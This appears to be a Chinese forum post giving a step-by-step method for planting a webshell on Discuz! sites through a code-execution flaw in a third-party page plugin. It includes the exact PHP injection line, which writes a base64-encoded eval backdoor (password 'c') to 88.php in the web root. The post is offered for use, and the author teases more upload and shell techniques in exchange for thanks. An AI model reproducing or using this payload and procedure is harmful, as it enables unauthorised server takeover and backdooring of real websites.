dz的新版安装插件需要安全码,恐怕这个比较难获取
具体哪些版本存在漏洞,自己测试,只要能安装这个插件的,就能拿到shell,这个已经在手里 很久了,但是使用其拿shell,也没几次,没事写出来,大家乐乐,别忘记感谢。
这个方法,就是需要 zend 支持【插件zend加密】,当然我还有一个不需要ZEND支持的,都是 app第三方的插件问题。
下面我来说说过程吧!
1.安装 zend 权限检查插件,因为后面利用到的插件是zend加密的,只要装了这个插件,后面的插件才能正常安装!
http://addon.discuz.com/?@study_zendcheck.pack
2.安装雨哲关于我们单页插件。 【ps:雨哲的好几个插件都有这个代码执行漏洞,自己发掘~!】
3.页面管理,随便编辑一个页面,注意到了吧,没错,任意代码执行,下面我们就让生成一个小马
我插入:
fputs(fopen('88.php',w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2NdKTs/Pg=="));
然后我提交!
4.保存好后,我们点预览刚才编辑的页面,如图:
5.来看看我们的成果,会在根目录下面生成:88.php 密码为:c
无图无真相,翠花上图:
还有一个不需要 zend权限的插件,能直接上传任何后缀名的文件,看感谢情况而定,是否发出。
还有 Discuz!NT 高版本 rss.aspx 不能编辑的情况下,进入后台后 拿shell 的办法。这次就不说了
|